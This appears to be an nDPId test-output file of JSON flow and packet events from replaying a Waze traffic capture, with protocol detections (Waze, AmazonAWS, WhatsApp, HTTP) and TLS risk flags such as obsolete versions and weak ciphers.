-00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880579,"flow_last_seen":1435587880579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880579,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1435587880579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880579,"pkt":"ABoRAAACABoRAAABCABFAAAohIxAAEAG3tQKCAAByKAExrBxAFBvlik9kGnb21AR\/\/8iigAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1435587880580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAAodUdAABAGHhrIoATGCggAAQBQsHGQadvbb5YpPlAQ\/\/8iigAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1435587880580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAAodUhAABAGHhnIoATGCggAAQBQsHGQadvbb5YpPlAR\/\/8iiQAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880580,"flow_last_seen":1435587880580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880580,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1435587880580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAA0VK5AAEAG6ZcKECWdyKAEMc7ZAFAfHIxhueqe64ARAVv9kwAAAQEICgAIcK4TbCOv"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1435587880580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAAodUlAABAG+QjIoAQxChAlnQBQztm56p7rHxyMYlAQ\/\/\/f1wAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1435587880581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880581,"pkt":"ABoRAAACABoRAAABCABFAAAodUpAABAG+QfIoAQxChAlnQBQztm56p7rHxyMYlAR\/\/\/f1gAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880581,"flow_last_seen":1435587880581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880581,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1435587880581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880581,"pkt":"ABoRAAACABoRAAABCABFAAA02RhAAEAGZS0KECWdyKAEMc4KAFB1GwfcXT3HdoARAVthCwAAAQEICgAIcK4TbCOv"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1435587880582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880582,"pkt":"ABoRAAACABoRAAABCABFAAAodUtAABAG+QbIoAQxChAlnQBQzgpdPcd2dRsH3VAQ\/\/9DTwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1435587880582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880582,"pkt":"ABoRAAACABoRAAABCABFAAAodUxAABAG+QXIoAQxChAlnQBQzgpdPcd2dRsH3VAR\/\/9DTgAA"} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880583,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880583,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880583,"pkt":"ABoRAAACABoRAAABCABFAAAo9fdAAEAGbf4KCAAByKAEMeyeAFAiBCaW3fvegVAR\/\/\/m8gAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1435587880586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880586,"pkt":"ABoRAAACABoRAAABCABFAAAodU1AABAGHqnIoAQxCggAAQBQ7J7d+96BIgQml1AQ\/\/\/m8gAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1435587880587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880587,"pkt":"ABoRAAACABoRAAABCABFAAAodU5AABAGHqjIoAQxCggAAQBQ7J7d+96BIgQml1AR\/\/\/m8QAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880587,"flow_last_seen":1435587880587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880587,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1435587880587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880587,"pkt":"ABoRAAACABoRAAABCABFAAAoE7JAAEAGT68KCAAByKAExqhRAbtmrsLcmVFRdFAR\/\/8aBwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1435587880588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880588,"pkt":"ABoRAAACABoRAAABCABFAAAodU9AABAGHhLIoATGCggAAQG7qFGZUVF0Zq7C3VAQ\/\/8aBwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1435587880588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880588,"pkt":"ABoRAAACABoRAAABCABFAAAodVBAABAGHhHIoATGCggAAQG7qFGZUVF0Zq7C3VAR\/\/8aBgAA"} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880589,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880589,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880589,"pkt":"ABoRAAACABoRAAABCABFAAAoS15AAEAGGJgKCAAByKAEMew\/Abump6BqWVh1BVAR\/\/\/VjgAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880589,"pkt":"ABoRAAACABoRAAABCABFAAAodVJAABAGHqTIoAQxCggAAQG77D9ZWHUFpqega1AQ\/\/\/VjgAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880589,"pkt":"ABoRAAACABoRAAABCABFAAAodVNAABAGHqPIoAQxCggAAQG77D9ZWHUFpqega1AR\/\/\/VjQAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587894241,"flow_last_seen":1435587894241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587894241,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1435587894241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587894241,"pkt":"ABoRAAACABoRAAABCABFAAA87+5AAEAGZNsKCAABLjOtto0mAbvDfJnqAAAAAKAC\/\/\/\/twAAAgQFtAQCCAoACHYEAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1435587894244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587894244,"pkt":"ABoRAAACABoRAAABCABFAAAodXFAABAGD20uM622CggAAQG7jSY8g2YVw3yZ61AS\/\/86\/gAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1435587894244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587894244,"pkt":"ABoRAAACABoRAAABCABFAAAo7+9AAEAGZO4KCAABLjOtto0mAbvDfJnrPINmFlAQ\/\/86\/wAA"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587894241,"flow_last_seen":1435587894323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587894323,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":537,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587894241,"flow_last_seen":1435587894759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587894759,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587898822,"flow_last_seen":1435587898822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587898822,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1435587898822,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587898822,"pkt":"ABoRAAACABoRAAABCABFAAA8qMZAAEAGamAKCAABbKiw5MaMAbuJft8IAAAAAKAC\/\/93xAAAAgQFtAQCCAoACHfOAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1435587898824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587898824,"pkt":"ABoRAAACABoRAAABCABFAAAodXtAABAGzb9sqLDkCggAAQG7xox2gSD3iX7fCVAS\/\/+\/9AAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1435587898824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587898824,"pkt":"ABoRAAACABoRAAABCABFAAAoqMdAAEAGanMKCAABbKiw5MaMAbuJft8JdoEg+FAQ\/\/+\/9QAA"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587898822,"flow_last_seen":1435587898874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1435587898874,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587905035,"flow_last_seen":1435587905035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587905035,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1435587905035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587905035,"pkt":"ABoRAAACABoRAAABCABFAAA82iNAAEAGeqYKCAABLjOtto0pAbvwXaAfAAAAAKAC\/\/\/IZgAAAgQFtAQCCAoACHo8AAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1435587905038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587905038,"pkt":"ABoRAAACABoRAAABCABFAAAodYZAABAGD1guM622CggAAQG7jSkPol\/g8F2gIFAS\/\/86+wAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1435587905039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587905039,"pkt":"ABoRAAACABoRAAABCABFAAAo2iRAAEAGerkKCAABLjOtto0pAbvwXaAgD6Jf4VAQ\/\/86\/AAA"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587905035,"flow_last_seen":1435587905111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587905111,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01096{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":580,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587905035,"flow_last_seen":1435587905510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587905510,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587905035,"flow_last_seen":1435587905565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587905565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1435587868632,"flow_last_seen":1435587869162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1624,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} 